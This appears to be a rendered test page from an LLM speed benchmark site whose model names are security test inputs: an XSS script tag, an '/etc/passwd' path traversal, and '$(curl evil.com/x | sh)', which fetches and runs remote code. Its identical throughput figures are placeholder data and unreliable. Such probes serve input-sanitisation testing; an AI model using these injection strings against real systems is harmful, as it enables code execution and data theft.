Pentest-Bench — LLM benchmarks

12 workload results across 9 models.

Fastest known config on Pentest-Bench

42.0 decode tok/s

<script>alert(1)</script> via llama.cpp (Q4_K_M) see full run

<script>alert(1)</script>

Workload    Backend          Quant   decode tok/s  prefill tok/s  TTFT     Run
chat-short  llama.cpp@b9999  Q4_K_M  42.00 tok/s   100.0 tok/s    50.0 ms  r_a3ei8og3rkg

victim

Workload    Backend          Quant   decode tok/s  prefill tok/s  TTFT     Run
chat-short  llama.cpp@b9999  Q4_K_M  42.00 tok/s   100.0 tok/s    50.0 ms  r_b-ndu-9uswz

actual-name

Workload    Backend          Quant   decode tok/s  prefill tok/s  TTFT     Run
chat-short  llama.cpp@b9999  Q4_K_M  42.00 tok/s   100.0 tok/s    50.0 ms  r_0heij9dzacw

beforeafter

Workload    Backend          Quant   decode tok/s  prefill tok/s  TTFT     Run
chat-short  llama.cpp@b9999  Q4_K_M  42.00 tok/s   100.0 tok/s    50.0 ms  r__zyiw9l3_c5

xy

Workload    Backend          Quant   decode tok/s  prefill tok/s  TTFT     Run
chat-short  llama.cpp@b9999  Q4_K_M  42.00 tok/s   100.0 tok/s    50.0 ms  r_2nqkbpdq-dk

a/b/../../etc/passwd

Workload    Backend          Quant   decode tok/s  prefill tok/s  TTFT     Run
chat-short  llama.cpp@b9999  Q4_K_M  42.00 tok/s   100.0 tok/s    50.0 ms  r_8zc2yi4had5

$(curl evil.com/x | sh)

Workload    Backend          Quant   decode tok/s  prefill tok/s  TTFT     Run
chat-short  llama.cpp@b9999  Q4_K_M  42.00 tok/s   100.0 tok/s    50.0 ms  r_kkseorkbdk3

innocent/bin/sh

Workload    Backend          Quant   decode tok/s  prefill tok/s  TTFT     Run
chat-short  llama.cpp@b9999  Q4_K_M  42.00 tok/s   100.0 tok/s    50.0 ms  r_0laxq0naoht

test-model

Workload    Backend          Quant   decode tok/s  prefill tok/s  TTFT     Run
chat-short  llama.cpp@b9999  Q4_K_M  42.00 tok/s   100.0 tok/s    50.0 ms  r_1jskg9qv_8b
chat-short  llama.cpp@b9999  Q4_K_M  42.00 tok/s   100.0 tok/s    50.0 ms  r_rl-kbwr9chb
chat-short  llama.cpp@b9999  Q4_K_M  42.00 tok/s   100.0 tok/s    50.0 ms  r_7z262rwoo08
chat-short  llama.cpp@b9999  Q4_K_M  42.00 tok/s   100.0 tok/s    50.0 ms  r_wd6-1z548j_

Models measured on Pentest-Bench

Common questions about Pentest-Bench

Direct Q&A drawn from the runs above: fastest LLM, supported model classes, backend rankings, quantization guidance.

Read the Pentest-Bench FAQ →